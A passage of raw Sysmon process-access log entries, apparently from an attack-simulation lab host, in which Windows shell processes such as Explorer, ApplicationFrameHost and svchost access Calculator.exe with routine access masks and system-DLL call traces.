Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362292Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.725{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362291Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362290Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362289Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362288Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362287Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362286Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362285Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000362284Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000362283Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362282Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.710{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362281Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000362280Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000362279Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362278Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362277Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362276Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362275Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362274Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362273Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362272Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362271Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362270Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362269Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 